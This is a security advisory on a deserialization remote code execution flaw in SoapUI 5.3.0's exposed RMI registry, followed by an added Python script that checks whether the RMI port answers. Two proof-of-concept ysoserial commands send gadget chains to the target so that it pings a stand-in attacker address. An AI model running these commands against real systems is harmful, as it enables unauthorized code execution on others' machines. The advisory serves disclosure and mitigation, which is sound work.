SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization

2017.10.08
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: SmartBear SoapUI - Remote Code Execution via Deserialization
Author: Jakub Palaczynski
Date: 12. July 2017

Exploit tested on:
==================

SoapUI 5.3.0
Also works on older versions.

Vulnerability:
**************

Remote Code Execution via Deserialization:
=================================

SoapUI by default listens on all interfaces on TCP port 1198, where a SoapUI Integration (RMI) instance is exposed. SoapUI uses vulnerable Java libraries (commons-collections-3.2.1.jar and groovy-all-2.1.7.jar) that can be used to remotely execute commands with the permissions of the user that started SoapUI.

Entry point: Java RMI Registry on TCP port 1198
Vulnerable libraries used: commons-collections-3.2.1.jar and groovy-all-2.1.7.jar

Proof of Concept:

Sample PoC using Commons Collections vulnerable library:

java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 CommonsCollections1 'ping OUR_IP'

Sample PoC using Groovy vulnerable library:

java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping OUR_IP'

Mitigations:

- bind SoapUI Integration instance to localhost if possible
- update all Java libraries that are known to be vulnerable:
  commons-collections-3.2.1.jar
  groovy-all-2.1.7.jar

Contact:
========
Jakub[dot]Palaczynski[at]gmail[dot]com
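The following is an added verification script, not part of the advisory and not SoapUI's code: it speaks only the JRMP stream-protocol greeting (the first bytes any RMI client sends) and reports whether an RMI listener answers on a given address, so an administrator can confirm that the "bind to localhost" mitigation took effect (loopback answers, external interfaces do not). The port default comes from the advisory; the sample response bytes in the test are constructed.

```python
"""Check whether a Java RMI listener (SoapUI Integration, TCP 1198) answers on an address."""
import socket
import struct

JRMP_MAGIC = b"JRMI"       # 0x4a524d49, start of every JRMP connection
JRMP_VERSION = 2
STREAM_PROTOCOL = 0x4B     # client asks for the stream protocol
PROTOCOL_ACK = 0x4E        # server accepts the protocol
DEFAULT_PORT = 1198        # SoapUI Integration (RMI) port named in the advisory


def build_handshake() -> bytes:
    """Header a JRMP client sends first: magic, version (big-endian short), protocol byte."""
    return JRMP_MAGIC + struct.pack(">H", JRMP_VERSION) + bytes([STREAM_PROTOCOL])


def parse_ack(data: bytes):
    """Parse ProtocolAck: 0x4e, then the client host as writeUTF (2-byte length + bytes)
    and the client port as a 4-byte int. Returns (host, port) or None if incomplete/other."""
    if len(data) < 3 or data[0] != PROTOCOL_ACK:
        return None
    (n,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + n + 4:
        return None
    host = data[3:3 + n].decode("utf-8", errors="replace")
    (port,) = struct.unpack(">i", data[3 + n:3 + n + 4])
    return host, port


def rmi_listener_answers(host: str, port: int = DEFAULT_PORT, timeout: float = 3.0):
    """Return the server's view of our endpoint if an RMI listener acks, else None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_handshake())
            data = b""
            while len(data) < 256 and parse_ack(data) is None:
                chunk = s.recv(256)
                if not chunk:
                    break
                data += chunk
            return parse_ack(data)
    except OSError:
        return None


def exposure_report(addresses, port: int = DEFAULT_PORT) -> dict:
    """Map each address to True/False; only loopback should be True once mitigated."""
    return {addr: rmi_listener_answers(addr, port) is not None for addr in addresses}


if __name__ == "__main__":
    # Assumed addresses: loopback plus the host's own external address.
    print(exposure_report(["127.0.0.1", socket.gethostbyname(socket.gethostname())]))
```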



Copyright 2017, cxsecurity.com
